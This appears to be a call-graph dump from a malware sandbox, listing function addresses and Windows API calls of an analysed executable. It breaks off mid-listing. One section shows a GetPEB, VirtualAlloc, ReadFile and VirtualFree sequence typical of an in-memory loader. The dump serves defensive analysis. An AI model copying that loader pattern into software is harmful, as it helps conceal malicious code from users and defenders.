99827->99830 99832 fad748 99827->99832 99829 fad713 99828->99829 99831 fa8d68 __write 58 API calls 99829->99831 99833 fad752 99830->99833 99834 fad71b 99831->99834 99832->99806 99835 fa8d68 __write 58 API calls 99833->99835 99834->99806 99836 fad75a 99835->99836 99837 fa8ff6 __write 9 API calls 99836->99837 99837->99834 99838->99808 99839->99815 99841 fb1b90 __write_nolock 99840->99841 99842 fa09e2 GetLongPathNameW 99841->99842 99843 f87d2c 59 API calls 99842->99843 99844 f8741d 99843->99844 99845 f8716b 99844->99845 99846 f877c7 59 API calls 99845->99846 99847 f8717d 99846->99847 99848 f848ae 60 API calls 99847->99848 99849 f87188 99848->99849 99850 fbecae 99849->99850 99851 f87193 99849->99851 99855 fbecc8 99850->99855 99898 f87a68 61 API calls 99850->99898 99853 f83f84 59 API calls 99851->99853 99854 f8719f 99853->99854 99892 f834c2 99854->99892 99857 f871b2 Mailbox 99857->98778 99859 f84f3d 136 API calls 99858->99859 99860 f869ef 99859->99860 99861 fbe45a 99860->99861 99863 f84f3d 136 API calls 99860->99863 99862 fe97e5 122 API calls 99861->99862 99864 fbe46f 99862->99864 99865 f86a03 99863->99865 99866 fbe473 99864->99866 99867 fbe490 99864->99867 99865->99861 99868 f86a0b 99865->99868 99869 f84faa 84 API calls 99866->99869 99870 fa0ff6 Mailbox 59 API calls 99867->99870 99871 fbe47b 99868->99871 99872 f86a17 99868->99872 99869->99871 99877 fbe4d5 Mailbox 99870->99877 100005 fe4534 90 API calls _wprintf 99871->100005 99899 f86bec 99872->99899 99876 fbe489 99876->99867 99878 fbe689 99877->99878 99882 fbe69a 99877->99882 99889 f87f41 59 API calls 99877->99889 99991 f8766f 99877->99991 99999 f874bd 99877->99999 100006 fdfc4d 59 API calls 2 library calls 99877->100006 100007 fdfb6e 61 API calls 2 library calls 99877->100007 100008 fe7621 59 API calls Mailbox 99877->100008 99879 fa2f95 _free 58 API calls 99878->99879 99880 fbe691 99879->99880 99881 f84faa 84 API calls 99880->99881 99881->99882 99886 fa2f95 _free 58 API calls 99882->99886 99887 f84faa 84 API calls 99882->99887 100009 fdfcb1 89 API calls 4 library calls 99882->100009 99886->99882 99887->99882 99889->99877 99893 f834d4 99892->99893 99897 f834f3 _memmove 99892->99897 99895 fa0ff6 Mailbox 59 API calls 99893->99895 99894 fa0ff6 Mailbox 59 API calls 99896 f8350a 99894->99896 99895->99897 99896->99857 99897->99894 99898->99850 99900 fbe847 99899->99900 99901 f86c15 99899->99901 100101 fdfcb1 89 API calls 4 library calls 99900->100101 100015 f85906 60 API calls Mailbox 99901->100015 99904 fbe85a 100102 fdfcb1 89 API calls 4 library calls 99904->100102 99905 f86c37 100016 f85956 99905->100016 99908 f86c54 99910 f877c7 59 API calls 99908->99910 99912 f86c60 99910->99912 99911 fbe876 99914 f86cc1 99911->99914 100029 fa0b9b 60 API calls __write_nolock 99912->100029 99916 fbe889 99914->99916 99917 f86ccf 99914->99917 99915 f86c6c 99918 f877c7 59 API calls 99915->99918 99919 f85dcf CloseHandle 99916->99919 99920 f877c7 59 API calls 99917->99920 99922 f86c78 99918->99922 99923 fbe895 99919->99923 99921 f86cd8 99920->99921 99924 f877c7 59 API calls 99921->99924 99925 f848ae 60 API calls 99922->99925 99926 f84f3d 136 API calls 99923->99926 99927 f86ce1 99924->99927 99928 f86c86 99925->99928 99929 fbe8b1 99926->99929 100039 f846f9 99927->100039 100030 f859b0 ReadFile SetFilePointerEx 99928->100030 99930 fbe8da 99929->99930 99933 fe97e5 122 API calls 99929->99933 100103 fdfcb1 89 API calls 4 library calls 99930->100103 99937 fbe8cd 99933->99937 99936 f86cb2 100031 f85c4e 99936->100031 99940 fbe8f6 99937->99940 99941 fbe8d5 99937->99941 99944 f84faa 84 API calls 99940->99944 99943 f84faa 84 API calls 99941->99943 99943->99930 99946 fbe8fb 99944->99946 99945 f86e6c Mailbox 100010 f85934 99945->100010 99947 fa0ff6 Mailbox 59 API calls 99946->99947 99953 fbe92f 99947->99953 99951 f83bcd 99951->98645 99951->98667 99955 f8766f 59 API calls 99953->99955 99988 fbe978 Mailbox 99955->99988 99958 fbeb69 100108 fe7581 59 API calls Mailbox 99958->100108 99963 fbeb8b 100109 fef835 59 API calls 2 library calls 99963->100109 99966 fbeb98 99968 fa2f95 _free 58 API calls 99966->99968 99968->99945 99971 f8766f 59 API calls 99971->99988 99981 f87f41 59 API calls 99981->99988 99985 fbebbb 100110 fdfcb1 89 API calls 4 library calls 99985->100110 99987 fbebd4 99989 fa2f95 _free 58 API calls 99987->99989 99988->99958 99988->99971 99988->99981 99988->99985 100104 fdfc4d 59 API calls 2 library calls 99988->100104 100105 fdfb6e 61 API calls 2 library calls 99988->100105 100106 fe7621 59 API calls Mailbox 99988->100106 100107 f87373 59 API calls Mailbox 99988->100107 99990 fbe8f1 99989->99990 99990->99945 99992 f8770f 99991->99992 99996 f87682 _memmove 99991->99996 99994 fa0ff6 Mailbox 59 API calls 99992->99994 99993 fa0ff6 Mailbox 59 API calls 99995 f87689 99993->99995 99994->99996 99997 fa0ff6 Mailbox 59 API calls 99995->99997 99998 f876b2 99995->99998 99996->99993 99997->99998 99998->99877 100000 f874d0 99999->100000 100003 f8757e 99999->100003 100001 fa0ff6 Mailbox 59 API calls 100000->100001 100004 f87502 100000->100004 100001->100004 100002 fa0ff6 59 API calls Mailbox 100002->100004 100003->99877 100004->100002 100004->100003 100005->99876 100006->99877 100007->99877 100008->99877 100009->99882 100011 f85dcf CloseHandle 100010->100011 100012 f8593c Mailbox 100011->100012 100013 f85dcf CloseHandle 100012->100013 100014 f8594b 100013->100014 100014->99951 100015->99905 100017 f85dcf CloseHandle 100016->100017 100018 f85962 100017->100018 100113 f85df9 100018->100113 100020 f85981 100024 f859a4 100020->100024 100121 f85770 100020->100121 100022 f85993 100138 f853db SetFilePointerEx SetFilePointerEx 100022->100138 100024->99904 100024->99908 100025 fbe030 100139 fe3696 SetFilePointerEx SetFilePointerEx WriteFile 100025->100139 100026 f8599a 100026->100024 100026->100025 100028 fbe060 100028->100024 100029->99915 100030->99936 100032 f85c68 100031->100032 100033 f85cef SetFilePointerEx 100032->100033 100034 fbe151 100032->100034 100038 f85cc3 100032->100038 100152 f85dae SetFilePointerEx 100033->100152 100153 f85dae SetFilePointerEx 100034->100153 100037 fbe16b 100038->99914 100040 f877c7 59 API calls 100039->100040 100041 f8470f 100040->100041 100042 f877c7 59 API calls 100041->100042 100043 f84717 100042->100043 100044 f877c7 59 API calls 100043->100044 100045 f8471f 100044->100045 100046 f877c7 59 API calls 100045->100046 100047 f84727 100046->100047 100048 fbd8fb 100047->100048 100049 f8475b 100047->100049 100050 f881a7 59 API calls 100048->100050 100051 f879ab 59 API calls 100049->100051 100052 fbd904 100050->100052 100053 f84769 100051->100053 100054 f87eec 59 API calls 100052->100054 100055 f87e8c 59 API calls 100053->100055 100057 f8479e 100054->100057 100056 f84773 100055->100056 100056->100057 100058 f879ab 59 API calls 100056->100058 100059 f847de 100057->100059 100060 f847bd 100057->100060 100072 fbd924 100057->100072 100061 f84794 100058->100061 100154 f879ab 100059->100154 100065 f87b52 59 API calls 100060->100065 100064 f87e8c 59 API calls 100061->100064 100063 fbd9f4 100068 f87d2c 59 API calls 100063->100068 100064->100057 100069 f847c7 100065->100069 100066 f847ef 100067 f84801 100066->100067 100070 f881a7 59 API calls 100066->100070 100071 f84811 100067->100071 100073 f881a7 59 API calls 100067->100073 100086 fbd9b1 100068->100086 100069->100059 100076 f879ab 59 API calls 100069->100076 100070->100067 100075 f84818 100071->100075 100077 f881a7 59 API calls 100071->100077 100072->100063 100074 fbd9dd 100072->100074 100084 fbd95b 100072->100084 100073->100071 100074->100063 100080 fbd9c8 100074->100080 100078 f881a7 59 API calls 100075->100078 100085 f8481f Mailbox 100075->100085 100076->100059 100077->100075 100078->100085 100079 f87b52 59 API calls 100079->100086 100083 f87d2c 59 API calls 100080->100083 100081 fbd9b9 100082 f87d2c 59 API calls 100081->100082 100082->100086 100083->100086 100084->100081 100088 fbd9a4 100084->100088 100086->100059 100086->100079 100167 f87a84 59 API calls 2 library calls 100086->100167 100089 f87d2c 59 API calls 100088->100089 100089->100086 100101->99904 100102->99911 100103->99990 100104->99988 100105->99988 100106->99988 100107->99988 100108->99963 100109->99966 100110->99987 100114 fbe181 100113->100114 100115 f85e12 CreateFileW 100113->100115 100116 f85e34 100114->100116 100117 fbe187 CreateFileW 100114->100117 100115->100116 100116->100020 100117->100116 100118 fbe1ad 100117->100118 100119 f85c4e 2 API calls 100118->100119 100120 fbe1b8 100119->100120 100120->100116 100122 f8578b 100121->100122 100123 fbdfce 100121->100123 100124 f85c4e 2 API calls 100122->100124 100129 f8581a 100122->100129 100123->100129 100146 f85e3f 100123->100146 100125 f857ad 100124->100125 100126 f8538e 59 API calls 100125->100126 100128 f857b7 100126->100128 100128->100123 100130 f857c4 100128->100130 100129->100022 100131 fa0ff6 Mailbox 59 API calls 100130->100131 100132 f857cf 100131->100132 100133 f8538e 59 API calls 100132->100133 100134 f857da 100133->100134 100140 f85d20 100134->100140 100137 f85c4e 2 API calls 100137->100129 100138->100026 100139->100028 100141 f85d93 100140->100141 100145 f85d2e 100140->100145 100151 f85dae SetFilePointerEx 100141->100151 100143 f85807 100143->100137 100144 f85d66 ReadFile 100144->100143 100144->100145 100145->100143 100145->100144 100147 f85c4e 2 API calls 100146->100147 100148 f85e60 100147->100148 100149 f85c4e 2 API calls 100148->100149 100150 f85e74 100149->100150 100150->100129 100151->100145 100152->100038 100153->100037 100155 f879ba 100154->100155 100156 f87a17 100154->100156 100155->100156 100158 f879c5 100155->100158 100157 f87e8c 59 API calls 100156->100157 100159 f879e8 _memmove 100157->100159 100160 f879e0 100158->100160 100161 fbef32 100158->100161 100159->100066 100168 f88087 59 API calls Mailbox 100160->100168 100163 f88189 59 API calls 100161->100163 100164 fbef3c 100163->100164 100165 fa0ff6 Mailbox 59 API calls 100164->100165 100166 fbef5c 100165->100166 100167->100086 100168->100159 100170 f86ef5 100169->100170 100174 f87009 100169->100174 100171 fa0ff6 Mailbox 59 API calls 100170->100171 100170->100174 100173 f86f1c 100171->100173 100172 fa0ff6 Mailbox 59 API calls 100175 f86f91 100172->100175 100173->100172 100174->98784 100175->100174 100178 f874bd 59 API calls 100175->100178 100179 f8766f 59 API calls 100175->100179 100182 f863a0 100175->100182 100207 fd6ac9 59 API calls Mailbox 100175->100207 100178->100175 100179->100175 100180->98787 100181->98789 100208 f87b76 100182->100208 100207->100175 100209 fa0ff6 Mailbox 59 API calls 100208->100209 100736 f83633 100737 f8366a 100736->100737 100738 f83688 100737->100738 100739 f836e7 100737->100739 100776 f836e5 100737->100776 100743 f8375d PostQuitMessage 100738->100743 100744 f83695 100738->100744 100741 f836ed 100739->100741 100742 fbd31c 100739->100742 100740 f836ca DefWindowProcW 100778 f836d8 100740->100778 100746 f836f2 100741->100746 100747 f83715 SetTimer RegisterWindowMessageW 100741->100747 100786 f911d0 10 API calls Mailbox 100742->100786 100743->100778 100748 fbd38f 100744->100748 100749 f836a0 100744->100749 100755 f836f9 KillTimer 100746->100755 100756 fbd2bf 100746->100756 100750 f8373e CreatePopupMenu 100747->100750 100747->100778 100791 fe2a16 71 API calls _memset 100748->100791 100751 f836a8 100749->100751 100752 f83767 100749->100752 100750->100778 100757 f836b3 100751->100757 100770 fbd374 100751->100770 100784 f84531 64 API calls _memset 100752->100784 100754 fbd343 100787 f911f3 341 API calls Mailbox 100754->100787 100781 f844cb Shell_NotifyIconW _memset 100755->100781 100760 fbd2f8 MoveWindow 100756->100760 100761 fbd2c4 100756->100761 100763 f8374b 100757->100763 100764 f836be 100757->100764 100760->100778 100767 fbd2c8 100761->100767 100768 fbd2e7 SetFocus 100761->100768 100783 f845df 81 API calls _memset 100763->100783 100764->100740 100788 f844cb Shell_NotifyIconW _memset 100764->100788 100765 fbd3a1 100765->100740 100765->100778 100766 f8375b 100766->100778 100767->100764 100772 fbd2d1 100767->100772 100768->100778 100769 f8370c 100782 f83114 DeleteObject DestroyWindow Mailbox 100769->100782 100770->100740 100790 fd817e 59 API calls Mailbox 100770->100790 100785 f911d0 10 API calls Mailbox 100772->100785 100776->100740 100779 fbd368 100789 f843db 68 API calls _memset 100779->100789 100781->100769 100782->100778 100783->100766 100784->100766 100785->100778 100786->100754 100787->100764 100788->100779 100789->100776 100790->100776 100791->100765 100792 f81055 100797 f82649 100792->100797 100795 fa2f80 __cinit 67 API calls 100796 f81064 100795->100796 100798 f877c7 59 API calls 100797->100798 100799 f826b7 100798->100799 100804 f83582 100799->100804 100802 f82754 100803 f8105a 100802->100803 100807 f83416 59 API calls 2 library calls 100802->100807 100803->100795 100808 f835b0 100804->100808 100807->100802 100809 f835bd 100808->100809 100810 f835a1 100808->100810 100809->100810 100811 f835c4 RegOpenKeyExW 100809->100811 100810->100802 100811->100810 100812 f835de RegQueryValueExW 100811->100812 100813 f835ff 100812->100813 100814 f83614 RegCloseKey 100812->100814 100813->100814 100814->100810 100815 f81016 100820 f84ad2 100815->100820 100818 fa2f80 __cinit 67 API calls 100819 f81025 100818->100819 100821 fa0ff6 Mailbox 59 API calls 100820->100821 100822 f84ada 100821->100822 100823 f8101b 100822->100823 100827 f84a94 100822->100827 100823->100818 100828 f84a9d 100827->100828 100829 f84aaf 100827->100829 100830 fa2f80 __cinit 67 API calls 100828->100830 100831 f84afe 100829->100831 100830->100829 100832 f877c7 59 API calls 100831->100832 100833 f84b16 GetVersionExW 100832->100833 100834 f87d2c 59 API calls 100833->100834 100835 f84b59 100834->100835 100836 f87e8c 59 API calls 100835->100836 100844 f84b86 100835->100844 100837 f84b7a 100836->100837 100838 f87886 59 API calls 100837->100838 100838->100844 100839 f84bf1 GetCurrentProcess IsWow64Process 100840 f84c0a 100839->100840 100842 f84c89 GetSystemInfo 100840->100842 100843 f84c20 100840->100843 100841 fbdc8d 100845 f84c56 100842->100845 100855 f84c95 100843->100855 100844->100839 100844->100841 100845->100823 100848 f84c7d GetSystemInfo 100850 f84c47 100848->100850 100849 f84c32 100851 f84c95 2 API calls 100849->100851 100850->100845 100853 f84c4d FreeLibrary 100850->100853 100852 f84c3a GetNativeSystemInfo 100851->100852 100852->100850 100853->100845 100856 f84c2e 100855->100856 100857 f84c9e LoadLibraryA 100855->100857 100856->100848 100856->100849 100857->100856 100858 f84caf GetProcAddress 100857->100858 100858->100856 100859 f5295b 100860 f52960 100859->100860 100861 f50000 GetPEB 100860->100861 100862 f5296c 100861->100862 100863 f52a20 100862->100863 100864 f5298a 100862->100864 100881 f532d0 9 API calls 100863->100881 100868 f52630 100864->100868 100867 f52a07 100869 f50000 GetPEB 100868->100869 100878 f526cf 100869->100878 100871 f52700 CreateFileW 100874 f5270d 100871->100874 100871->100878 100872 f52729 VirtualAlloc 100873 f5274a ReadFile 100872->100873 100872->100874 100873->100874 100877 f52768 VirtualAlloc 100873->100877 100875 f5291c VirtualFree 100874->100875 100876 f5292a 100874->100876 100875->100876 100876->100867 100877->100874 100877->100878 100878->100872 100878->100874 100879 f52830 CloseHandle 100878->100879 100880 f52840 VirtualFree 100878->100880 100882 f53540 GetPEB 100878->100882 100879->100878 100880->100878 100881->100867 100883 f5356a 100882->100883 100883->100871 100884 f8568a 100891 f85c18 100884->100891 100890 f856ba Mailbox 100892 fa0ff6 Mailbox 59 API calls 100891->100892 100893 f85c2b 100892->100893 100894 fa0ff6 Mailbox 59 API calls 100893->100894 100895 f8569c 100894->100895 100896 f85632 100895->100896 100903 f85a2f 100896->100903 100898 f85643 100899 f85d20 2 API calls 100898->100899 100900 f85674 100898->100900 100910 f85bda 59 API calls 2 library calls 100898->100910 100899->100898 100900->100890 100902 f881c1 61 API calls Mailbox 100900->100902 100902->100890 100904 f85a40 100903->100904 100905 fbe065 100903->100905 100904->100898 100911 fd6443 59 API calls Mailbox 100905->100911 100907 fbe06f 100908 fa0ff6 Mailbox 59 API calls 100907->100908 100909 fbe07b 100908->100909 100910->100898 100911->100907 100912 f8e70b 100915 f8d260 100912->100915 100914 f8e719 100916 f8d27d 100915->100916 100943 f8d4dd 100915->100943 100917 fc2b0a 100916->100917 100918 fc2abb 100916->100918 100938 f8d2a4 100916->100938 100959 ffa6fb 341 API calls __cinit 100917->100959 100920 fc2abe 100918->100920 100929 fc2ad9 100918->100929 100922 fc2aca 100920->100922 100920->100938 100957 ffad0f 341 API calls 100922->100957 100923 fa2f80 __cinit 67 API calls 100923->100938 100926 f8d594 100951 f88bb2 68 API calls 100926->100951 100927 fc2cdf 100927->100927 100928 f8d6ab 100928->100914 100929->100943 100958 ffb1b7 341 API calls 3 library calls 100929->100958 100933 fc2c26 100963 ffaa66 89 API calls 100933->100963 100934 f8d5a3 100934->100914 100937 f88620 69 API calls 100937->100938 100938->100923 100938->100926 100938->100928 100938->100933 100938->100937 100938->100943 100946 f8a000 341 API calls 100938->100946 100947 f881a7 59 API calls 100938->100947 100949 f888a0 68 API calls __cinit 100938->100949 100950 f886a2 68 API calls 100938->100950 100952 f8859a 68 API calls 100938->100952 100953 f8d0dc 341 API calls 100938->100953 100954 f89f3a 59 API calls Mailbox 100938->100954 100955 f8d060 89 API calls 100938->100955 100956 f8cedd 341 API calls 100938->100956 100960 f88bb2 68 API calls 100938->100960 100961 f89e9c 60 API calls Mailbox 100938->100961 100962 fd6d03 60 API calls 100938->100962 100943->100928 100964 fea0b5 89 API calls 4 library calls 100943->100964 100946->100938 100947->100938 100949->100938 100950->100938 100951->100934 100952->100938 100953->100938 100954->100938 100955->100938 100956->100938 100957->100928 100958->100943 100959->100938 100960->100938 100961->100938 100962->100938 100963->100943 100964->100927 100965 f8b56e 100972 f9fb84 100965->100972 100967 f8b584 100981 f8c707 100967->100981 100969 f8b5ac 100971 f8a4e8 100969->100971 100993 fea0b5 89 API calls 4 library calls 100969->100993 100973 f9fb90 100972->100973 100974 f9fba2 100972->100974 100994 f89e9c 60 API calls Mailbox 100973->100994 100976 f9fba8 100974->100976 100977 f9fbd1 100974->100977 100978 fa0ff6 Mailbox 59 API calls 100976->100978 100995 f89e9c 60 API calls Mailbox 100977->100995 100980 f9fb9a 100978->100980 100980->100967 100982 f87b76 59 API calls 100981->100982 100983 f8c72c _wcscmp 100981->100983 100982->100983 100984 f87f41 59 API calls 100983->100984 100987 f8c760 Mailbox 100983->100987 100985 fc1abb 100984->100985 100986 f87c8e 59 API calls 100985->100986 100988 fc1ac6 100986->100988 100987->100969 100996 f8859a 68 API calls 100988->100996 100990 fc1ad7 100992 fc1adb Mailbox 100990->100992 100997 f89e9c 60 API calls Mailbox 100990->100997 100992->100969 100993->100971 100994->100980 100995->100980 100996->100990 100997->100992 100998 fc0226 101007 f8ade2 Mailbox 100998->101007 101000 fc0c86 101114 fd66f4 101000->101114 101002 fc0c8f 101004 fc00e0 VariantClear 101004->101007 101005 f8b6c1 101113 fea0b5 89 API calls 4 library calls 101005->101113 101007->101000 101007->101002 101007->101004 101007->101005 101012 ffe237 101007->101012 101015 ff474d 101007->101015 101024 fed2e6 101007->101024 101071 f92123 101007->101071 101111 f89df0 59 API calls Mailbox 101007->101111 101112 fd7405 59 API calls 101007->101112 101013 ffcdf1 130 API calls 101012->101013 101014 ffe247 101013->101014 101014->101007 101016 f89997 84 API calls 101015->101016 101017 ff4787 101016->101017 101018 f863a0 94 API calls 101017->101018 101019 ff4797 101018->101019 101020 ff47bc 101019->101020 101021 f8a000 341 API calls 101019->101021 101023 ff47c0 101020->101023 101117 f89bf8 101020->101117 101021->101020 101023->101007 101025 fed305 101024->101025 101027 fed310 101024->101027 101130 f89c9c 59 API calls 101025->101130 101030 f877c7 59 API calls 101027->101030 101069 fed3ea Mailbox 101027->101069 101028 fa0ff6 Mailbox 59 API calls 101029 fed433 101028->101029 101031 fed43f 101029->101031 101133 f85906 60 API calls Mailbox 101029->101133 101032 fed334 101030->101032 101035 f89997 84 API calls 101031->101035 101034 f877c7 59 API calls 101032->101034 101036 fed33d 101034->101036 101037 fed457 101035->101037 101038 f89997 84 API calls 101036->101038 101039 f85956 67 API calls 101037->101039 101040 fed349 101038->101040 101041 fed466 101039->101041 101042 f846f9 59 API calls 101040->101042 101043 fed49e 101041->101043 101044 fed46a GetLastError 101041->101044 101045 fed35e 101042->101045 101048 fed4c9 101043->101048 101049 fed500 101043->101049 101046 fed483 101044->101046 101047 f87c8e 59 API calls 101045->101047 101066 fed3f3 Mailbox 101046->101066 101134 f85a1a CloseHandle 101046->101134 101050 fed391 101047->101050 101052 fa0ff6 Mailbox 59 API calls 101048->101052 101051 fa0ff6 Mailbox 59 API calls 101049->101051 101053 fed3e3 101050->101053 101054 fe3e73 3 API calls 101050->101054 101055 fed505 101051->101055 101056 fed4ce 101052->101056 101132 f89c9c 59 API calls 101053->101132 101059 fed3a1 101054->101059 101062 f877c7 59 API calls 101055->101062 101055->101066 101060 fed4df 101056->101060 101063 f877c7 59 API calls 101056->101063 101059->101053 101061 fed3a5 101059->101061 101135 fef835 59 API calls 2 library calls 101060->101135 101064 f87f41 59 API calls 101061->101064 101062->101066 101063->101060 101067 fed3b2 101064->101067 101066->101007 101131 fe3c66 63 API calls Mailbox 101067->101131 101069->101028 101069->101066 101070 fed3bb Mailbox 101070->101053 101072 f89bf8 59 API calls 101071->101072 101073 f9213b 101072->101073 101075 fa0ff6 Mailbox 59 API calls 101073->101075 101077 fc69af 101073->101077 101076 f92154 101075->101076 101079 f92164 101076->101079 101157 f85906 60 API calls Mailbox 101076->101157 101078 f92189 101077->101078 101160 fef7df 59 API calls 101077->101160 101087 f92196 101078->101087 101161 f89c9c 59 API calls 101078->101161 101081 f89997 84 API calls 101079->101081 101083 f92172 101081->101083 101085 f85956 67 API calls 101083->101085 101084 fc69f7 101086 fc69ff 101084->101086 101084->101087 101088 f92181 101085->101088 101162 f89c9c 59 API calls 101086->101162 101089 f85e3f 2 API calls 101087->101089 101088->101077 101088->101078 101159 f85a1a CloseHandle 101088->101159 101092 f9219d 101089->101092 101093 fc6a11 101092->101093 101094 f921b7 101092->101094 101096 fa0ff6 Mailbox 59 API calls 101093->101096 101095 f877c7 59 API calls 101094->101095 101097 f921bf 101095->101097 101098 fc6a17 101096->101098 101136 f856d2 101097->101136 101100 fc6a2b 101098->101100 101163 f859b0 ReadFile SetFilePointerEx 101098->101163 101105 fc6a2f _memmove 101100->101105 101164 fe794e 59 API calls 2 library calls 101100->101164 101102 f921ce 101102->101105 101151 f89b9c 101102->101151 101106 f921e2 Mailbox 101107 f9221c 101106->101107 101108 f85dcf CloseHandle 101106->101108 101107->101007 101109 f92210 101108->101109 101109->101107 101158 f85a1a CloseHandle 101109->101158 101111->101007 101112->101007 101113->101000 101168 fd6636 101114->101168 101116 fd6702 101116->101002 101118 f89c08 101117->101118 101119 fbfbff 101117->101119 101123 fa0ff6 Mailbox 59 API calls 101118->101123 101120 fbfc10 101119->101120 101121 f87d2c 59 API calls 101119->101121 101122 f87eec 59 API calls 101120->101122 101121->101120 101124 fbfc1a 101122->101124 101125 f89c1b 101123->101125 101127 f89c34 101124->101127 101128 f877c7 59 API calls 101124->101128 101125->101124 101126 f89c26 101125->101126 101126->101127 101129 f87f41 59 API calls 101126->101129 101127->101023 101128->101127 101129->101127 101130->101027 101131->101070 101132->101069 101133->101031 101134->101066 101135->101066 101137 f856dd 101136->101137 101138 f85702 101136->101138 101137->101138 101141 f856ec 101137->101141 101139 f87eec 59 API calls 101138->101139 101147 fe349a 101139->101147 101142 f85c18 59 API calls 101141->101142 101143 fe35ba 101142->101143 101146 f85632 61 API calls 101143->101146 101145 fe34c9 101145->101102 101148 fe35c8 101146->101148 101147->101145 101165 fe3436 ReadFile SetFilePointerEx 101147->101165 101166 f87a84 59 API calls 2 library calls 101147->101166 101150 fe35d8 Mailbox 101148->101150 101167 f8793a 61 API calls Mailbox 101148->101167 101150->101102 101152 f89ba8 101151->101152 101153 f89be7 101151->101153 101155 fa0ff6 Mailbox 59 API calls 101152->101155 101154 f881a7 59 API calls 101153->101154 101156 f89bbb 101154->101156 101155->101156 101156->101106 101157->101079 101158->101107 101159->101077 101160->101077 101161->101084 101162->101092 101163->101100 101164->101105 101165->101147 101166->101147 101167->101150 101169 fd665e 101168->101169 101170 fd6641 101168->101170 101169->101116 101170->101169 101172 fd6621 59 API calls Mailbox 101170->101172 101172->101170 101173 fbff06 101174 fbff10 101173->101174 101209 f8ac90 Mailbox _memmove 101173->101209 101272 f88e34 59 API calls Mailbox 101174->101272 101180 f8b5d5 101187 f881a7 59 API calls 101180->101187 101181 fa0ff6 59 API calls Mailbox 101198 f8a097 Mailbox 101181->101198 101183 f881a7 59 API calls 101183->101198 101184 fc047f 101276 fea0b5 89 API calls 4 library calls 101184->101276 101185 f8b5da 101282 fea0b5 89 API calls 4 library calls 101185->101282 101193 f8a1b7 101187->101193 101188 f87f41 59 API calls 101188->101209 101191 f877c7 59 API calls 101191->101198 101192 fc048e 101195 fd7405 59 API calls 101195->101198 101196 fd66f4 Mailbox 59 API calls 101196->101193 101197 fc0e00 101281 fea0b5 89 API calls 4 library calls 101197->101281 101198->101180 101198->101181 101198->101183 101198->101184 101198->101185 101198->101191 101198->101193 101198->101195 101198->101197 101199 fa2f80 67 API calls __cinit 101198->101199 101202 f8a6ba 101198->101202 101266 f8ca20 341 API calls 2 library calls 101198->101266 101267 f8ba60 60 API calls Mailbox 101198->101267 101199->101198 101201 ffbf80 341 API calls 101201->101209 101280 fea0b5 89 API calls 4 library calls 101202->101280 101203 fd66f4 Mailbox 59 API calls 101203->101209 101204 f8b416 101271 f8f803 341 API calls 101204->101271 101205 f8a000 341 API calls 101205->101209 101207 fc0c94 101278 f89df0 59 API calls Mailbox 101207->101278 101209->101188 101209->101193 101209->101198 101209->101201 101209->101203 101209->101204 101209->101205 101209->101207 101210 fc0ca2 101209->101210 101213 f8b37c 101209->101213 101214 fa0ff6 59 API calls Mailbox 101209->101214 101219 f8b685 101209->101219 101222 f8ade2 Mailbox 101209->101222 101228 ffc5f4 101209->101228 101260 fe7be0 101209->101260 101273 fd7405 59 API calls 101209->101273 101274 ffc4a7 85 API calls 2 library calls 101209->101274 101279 fea0b5 89 API calls 4 library calls 101210->101279 101212 fc0c86 101212->101193 101212->101196 101269 f89e9c 60 API calls Mailbox 101213->101269 101214->101209 101216 f8b38d 101270 f89e9c 60 API calls Mailbox 101216->101270 101277 fea0b5 89 API calls 4 library calls 101219->101277 101222->101193 101222->101212 101222->101219 101223 fc00e0 VariantClear 101222->101223 101224 ff474d 341 API calls 101222->101224 101225 ffe237 130 API calls 101222->101225 101226 fed2e6 101 API calls 101222->101226 101227 f92123 95 API calls 101222->101227 101268 f89df0 59 API calls Mailbox 101222->101268 101275 fd7405 59 API calls 101222->101275 101223->101222 101224->101222 101225->101222 101226->101222 101227->101222 101229 f877c7 59 API calls 101228->101229 101230 ffc608 101229->101230 101231 f877c7 59 API calls 101230->101231 101232 ffc610 101231->101232 101233 f877c7 59 API calls 101232->101233 101234 ffc618 101233->101234 101235 f89997 84 API calls 101234->101235 101259 ffc626 101235->101259 101236 f87a84 59 API calls 101236->101259 101237 f87d2c 59 API calls 101237->101259 101238 ffc80f 101239 ffc83c Mailbox 101238->101239 101240 f89b9c 59 API calls 101238->101240 101239->101209 101240->101239 101241 ffc7f6 101244 f87e0b 59 API calls 101241->101244 101242 ffc811 101246 f87e0b 59 API calls 101242->101246 101243 f881a7 59 API calls 101243->101259 101245 ffc803 101244->101245 101249 f87c8e 59 API calls 101245->101249 101247 ffc820 101246->101247 101250 f87c8e 59 API calls 101247->101250 101248 f87faf 59 API calls 101252 ffc6bd CharUpperBuffW 101248->101252 101249->101238 101250->101238 101251 f87faf 59 API calls 101253 ffc77d CharUpperBuffW 101251->101253 101283 f8859a 68 API calls 101252->101283 101255 f8c707 69 API calls 101253->101255 101255->101259 101256 f89997 84 API calls 101256->101259 101257 f87e0b 59 API calls 101257->101259 101258 f87c8e 59 API calls 101258->101259 101259->101236 101259->101237 101259->101238 101259->101239 101259->101241 101259->101242 101259->101243 101259->101248 101259->101251 101259->101256 101259->101257 101259->101258 101261 fe7bec 101260->101261 101262 fa0ff6 Mailbox 59 API calls 101261->101262 101263 fe7bfa 101262->101263 101264 fe7c08 101263->101264 101265 f877c7 59 API calls 101263->101265 101264->101209 101265->101264 101266->101198 101267->101198 101268->101222 101269->101216 101270->101204 101271->101219 101272->101209 101273->101209 101274->101209 101275->101222 101276->101192 101277->101212 101278->101212 101279->101212 101280->101193 101281->101185 101282->101193 101283->101259 101284 f81066 101289 f8f8cf 101284->101289 101286 f8106c 101287 fa2f80 __cinit 67 API calls 101286->101287 101288 f81076 101287->101288 101290 f8f8f0 101289->101290 101322 fa0143 101290->101322 101294 f8f937 101295 f877c7 59 API calls 101294->101295 101296 f8f941 101295->101296 101297 f877c7 59 API calls 101296->101297 101298 f8f94b 101297->101298 101299 f877c7 59 API calls 101298->101299 101300 f8f955 101299->101300 101301 f877c7 59 API calls 101300->101301 101302 f8f993 101301->101302 101303 f877c7 59 API calls 101302->101303 101304 f8fa5e 101303->101304 101332 f960e7 101304->101332 101308 f8fa90 101309 f877c7 59 API calls 101308->101309 101310 f8fa9a 101309->101310 101360 f9ffde 101310->101360 101312 f8fae1 101313 f8faf1 GetStdHandle 101312->101313 101314 f8fb3d 101313->101314 101315 fc49d5 101313->101315 101317 f8fb45 OleInitialize 101314->101317 101315->101314 101316 fc49de 101315->101316 101367 fe6dda 64 API calls Mailbox 101316->101367 101317->101286 101319 fc49e5 101368 fe74a9 CreateThread 101319->101368 101321 fc49f1 CloseHandle 101321->101317 101369 fa021c 101322->101369 101325 fa021c 59 API calls 101326 fa0185 101325->101326 101327 f877c7 59 API calls 